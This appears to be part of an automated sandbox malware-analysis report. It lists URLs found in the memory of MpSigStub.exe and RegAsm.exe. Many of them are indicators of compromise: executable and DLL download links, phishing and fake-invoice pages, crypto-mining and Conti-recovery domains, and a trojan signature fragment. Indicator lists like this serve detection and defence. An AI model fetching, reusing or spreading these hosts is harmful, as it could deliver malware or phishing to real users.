    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.shiyongsousuo.com
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
    Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmpString found in binary or memory: http://www.sitem.biz/
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://www.skkyc2004.cn
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://www.smartpcfixer.com//
    Source: MpSigStub.exe, 00000023.00000003.6283884268.0000028BD64D2000.00000004.00000001.sdmpString found in binary or memory: http://www.sniperspy.com/guide.html
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.sogou.com/web?query=%s
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
    Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmpString found in binary or memory: http://www.somegreatsongs.com/license.cgi?vidlock_params=
    Source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmpString found in binary or memory: http://www.somegreatsongs.com/promo/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.soso.com/q?w=%s
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.sotrag.eu/invoice
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://www.speeditupfree.com
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://www.speeditupfree.comxA
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.sportscn.com/
    Source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmpString found in binary or memory: http://www.spyburner.com/activate.php?time=
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://www.spylocked.com/?
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.sqwire.com
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://www.sqwire.com/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
    Source: MpSigStub.exe, 00000023.00000003.6319962733.0000028BD6878000.00000004.00000001.sdmpString found in binary or memory: http://www.start-space.com/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.steelbendersrfq.cf/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.stimteam.co.za/images
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.stockstar.com/
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.superpctools.com
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmpString found in binary or memory: http://www.support.me/
    Source: MpSigStub.exe, 00000023.00000003.6326014719.0000028BD66E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.supremocontrol.com/
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.supremocontrol.com/a
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.surprisingdd.top
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://www.sweet-page.com/?type=sc
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://www.symantec.com
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://www.sync15.com/bizpolx.exe
    Source: MpSigStub.exe, 00000023.00000003.6341363005.0000028BD7DAE000.00000004.00000001.sdmpString found in binary or memory: http://www.systweak.com/registrycleaner
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://www.tagbao.com/open
    Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmpString found in binary or memory: http://www.taktuk.tk
    Source: MpSigStub.exe, 00000023.00000003.6305136059.0000028BD6F84000.00000004.00000001.sdmpString found in binary or memory: http://www.tangosearch.com/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.tarazsystem.com/wp-admin/pl21.php)
    Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmpString found in binary or memory: http://www.tattoopower.it/invoice-
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: http://www.tazbao.com/setup-
    Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmpString found in binary or memory: http://www.technologiesaintjoseph.com/uninstall.php?
    Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmpString found in binary or memory: http://www.tempuri.org/DataSet1.xsd
    Source: MpSigStub.exe, 00000023.00000003.6279385939.0000028BD6BD6000.00000004.00000001.sdmpString found in binary or memory: http://www.thebestofnet.com/exit/
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpString found in binary or memory: http://www.thedomaindata.com/
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://www.thefacebooksinfo.com/Public/softs/freefinder/FreeFinderResourcesNew.zip
    Source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmpString found in binary or memory: http://www.thehun.com/
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://www.thepitstopjohnstone.co.uk/invoice/
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://www.thon-samson.be/js/_notes/
    Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmpString found in binary or memory: http://www.tiandy.com/rechnung-
    Source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmpString found in binary or memory: http://www.tibia.com/community/?subtopic=characters%26name=
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.tiexue.net/
    Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmpString found in binary or memory: http://www.tijuanalaw.com/
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.tq121.com.cn/
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsim
    Source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmpString found in binary or memory: http://www.trafficjam.nl/?failed=initialize.delsimProgramFilesDir
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://www.traramayeri.net
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.tripod.com
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://www.trotux.com/?z=
    Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://www.tubedigger.com
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://www.turtlecoin.lol
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.tvcodec.net/newest-codecpack.php
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
    Source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://www.universal101.com/upd
    Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://www.up.com.jo/gov/lsass.exe
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://www.update-srv.info
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: http://www.update-srv1.info
    Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmpString found in binary or memory: http://www.usaa.com/inet/
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.usatoday.com/search/results?q=
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: http://www.v9.com/v9tb/
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.v9tr.com
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.virtrigger.com
    Source: MpSigStub.exe, 00000023.00000003.6292767693.0000028BD7F7B000.00000004.00000001.sdmpString found in binary or memory: http://www.virtrigger.coma
    Source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmpString found in binary or memory: http://www.vivendosemfronteiras.com/torpedo/sms/foto/vivo/fototorpedo/
    Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmpString found in binary or memory: http://www.voxcards.com.br
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://www.wajam.com/webenhancer/logging
    Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmpString found in binary or memory: http://www.wajam.com/webenhancer/loggingxM
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://www.webflora.co.kr/slog/skin/setup.ini
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.webtreats.info/__asf_script_command_ends_here__
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://www.webye163.cn
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://www.whitehouseknutsford.co.uk/invoice-status/please-pull-invoice-684594/
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://www.win-spy.com/update
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: http://www.win-touch.com
    Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmpString found in binary or memory: http://www.windupdates.com
    Source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmpString found in binary or memory: http://www.winferno.com/re/support.asp
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.wintask16.com/exc2.txt
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://www.wisefixer.com/
    Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmpString found in binary or memory: http://www.woothemes.com/flexslider/
    Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmpString found in binary or memory: http://www.wordsmyth.net/cgi-bin/search.cgi
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.wosss.com/search.aspx?q=%s
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.wuweigame.com/asp/y.js
    Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmpString found in binary or memory: http://www.wuweixian.com/we_down/k2_v/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.xanga.com
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://www.xia3.com/
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.xiuzhe.com/ddvan.exe
    Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmpString found in binary or memory: http://www.xpassgenerator.com/software/d
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://www.xpsecuritycenter.com/XPSecurityCenter/
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: http://www.xupiter.com/d
    Source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmpString found in binary or memory: http://www.xzwrn.cn/
    Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.yahoo.com
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://www.yessearches.com/?ts=
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://www.yfdc.com.tw/wp-content/uploads/2015/11/z.htm
    Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmpString found in binary or memory: http://www.yihaha.net/
    Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmpString found in binary or memory: http://www.yklbtrnklnbkjrnbjyrbnjka.com
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.yodao.com/search?ue=utf8&q=%s
    Source: MpSigStub.exe, 00000023.00000003.6280069144.0000028BD7AC1000.00000004.00000001.sdmpString found in binary or memory: http://www.youndoo.com/?z=
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://www.youtoba01.hpg.com.br
    Source: MpSigStub.exe, 00000023.00000003.6291965399.0000028BD7440000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/
    Source: MpSigStub.exe, 00000023.00000003.6341569052.0000028BD6C4E000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/watch?v=
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/watch?v=Vjp7vgj119s
    Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/watch?v=nqpod5at30g
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://www.ysbweb.com/ist/scripts/ysb_prompt.php?retry=2&loadfirst=1&delayload=0&software_id=10&acco
    Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmpString found in binary or memory: http://www.ysbweb.com/ist/softwares/v4.0/ysb_regular.cab
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://www.yuyu.com/?fav2
    Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmpString found in binary or memory: http://www.zabosaltd.biz/wafugi?id=COMPIDHERE&w=WEBMIDHERE&step=
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongsou.com/kefu/zskf.htm
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://www.ziduscapital.com/en/_mmserverscripts/index.php?e=)
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://www.zixzelz1.narod.ru/
    Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmpString found in binary or memory: http://www.znoo.net
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://www.zv05.com/sys2a
    Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmpString found in binary or memory: http://www.zxboy.com#http://
    Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmpString found in binary or memory: http://www1.yzsc.cn/cash
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://www5.baidu.com/baidu?
    Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmpString found in binary or memory: http://www5.baidu.com/s?
    Source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmpString found in binary or memory: http://www6.badesugerwakirpos.com/chr/907/nt.exe
    Source: MpSigStub.exe, 00000023.00000003.6312714800.0000028BD7136000.00000004.00000001.sdmpString found in binary or memory: http://www6HSTR:Trojan:Win32/Stration.KFOP:Stration.encHSTR:TrojanDownloader:Win32/Stration_executeS
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: http://wwwwww.f2kk.cn
    Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmpString found in binary or memory: http://x0.nl/install/
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: http://x01c4fr.sed.doormedic.com
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
    Source: RegAsm.exe, 0000000A.00000002.7255877964.0000000020340000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/%
    Source: RegAsm.exe, 0000000A.00000002.7228491604.0000000001518000.00000004.00000020.sdmpString found in binary or memory: http://x1.i.lencr.org/&
    Source: RegAsm.exe, 0000000A.00000002.7246965735.000000001E321000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
    Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmpString found in binary or memory: http://x3redir.mooo.com?r=wmp&title=
    Source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmpString found in binary or memory: http://xhuehs.cantvenlinea.ru:1942
    Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmpString found in binary or memory: http://xinblasta.us/cj/siyrhz.doc
    Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmpString found in binary or memory: http://xisake.biz/control/
    Source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmpString found in binary or memory: http://xmr-services.com/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://xmr.enjoytopic.tk
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://xn----9sblbqqdv0a5a8fwb.xn--p1ai/includes/
    Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmpString found in binary or memory: http://xn----dtbhbqh9ajceeeg2m.org/components
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: http://xpressdelivery.ga/guangzhou/guangzhou2.html)
    Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmpString found in binary or memory: http://xupaeudenovo.net/net.jsp
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: http://xvive.com/twiki/b.txt
    Source: MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmpString found in binary or memory: http://xwjhdjylqeypyltby.ml/liverpool-fc-news/features/
    Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmpString found in binary or memory: http://xx.522love.cn/tool/down
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://xy2.eu/e8ar
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://xy2.eu/e8he
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://xy2.eu/e8qq
    Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmpString found in binary or memory: http://xy2.eu/e8u9
    Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/877973640937897984/878021367742734376/wdqdwq.dllx
    Source: MpSigStub.exe, 00000023.00000003.6437087417.0000028BD682E000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com/avatars/
    Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmpString found in binary or memory: https://cdn342.org/.well-known/files/limited/upgrade/index.php?email=patent-license
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://cdn4.buysellads.net/pub/tempmail.js?
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://cdshgvjs.ygto.com/leo/
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://ceibosnorte.com/images/clients/01/
    Source: MpSigStub.exe, 00000023.00000003.6436439478.0000028BD6A3D000.00000004.00000001.sdmpString found in binary or memory: https://cheelersplus.xyz/audio/z2fyes5jywxsywdoyw5achjvdgl2axrplmnvbq==
    Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmpString found in binary or memory: https://chiddingstonenursery.co.uk/loign.php?user=
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://childrenplacebd.com/childrendc/
    Source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmpString found in binary or memory: https://childrenplacebd.com/childrendc/polo.php
    Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmpString found in binary or memory: https://chinatyres.net/IuNbOpen/oiUnbYATR.php
    Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmpString found in binary or memory: https://chogoon.com/srt/d7q0j
    Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmpString found in binary or memory: https://chpingnow.xyz/21.psd
    Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6282961298.0000028BD6AC6000.00000004.00000001.sdmpString found in binary or memory: https://chrome.google.com/webstore
    Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmpString found in binary or memory: https://clashwoman.info/
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://cld.pt/dl/download/30e57a1d-338a-4c1b-9ad9-db0220f77ef0/bruto.jpg
    Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmpString found in binary or memory: https://clicks.life/care/
    Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmpString found in binary or memory: https://cmail.daum.net/v2/
    Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmpString found in binary or memory: https://cnaaa11sd.gb.net/efcdsvftgxc/?gdes3sc=6sdfr45
    Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmpString found in binary or memory: https://co3.live
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://coffreo.biz/xmlrpc.php
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://coki.me/a5oly
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://coki.me/az2yl
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://coki.me/epnq7
    Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmpString found in binary or memory: https://coki.me/xmwds
    Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmpString found in binary or memory: https://colintx-owaupdate.c9users.io/nmadbmt/365.html
    Source: MpSigStub.exe, 00000023.00000003.6269231712.0000028BC3EF4000.00000004.00000001.sdmpString found in binary or memory: https://configdl.teamviewer.com/configs
    Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmpString found in binary or memory: https://connect.statetechlink.xyz/?e=
    Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmpString found in binary or memory: https://connectoutlook.email/main.php
    Source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/upload
    Source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmpString found in binary or memory: https://content.dropboxapi.com/2/files/uploadxA
    Source: MpSigStub.exe, 00000023.00000003.6335572342.0000028BD6FAA000.00000004.00000001.sdmpString found in binary or memory: https://contirecovery.best
    Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmpString found in binary or memory: https://contirecovery.info
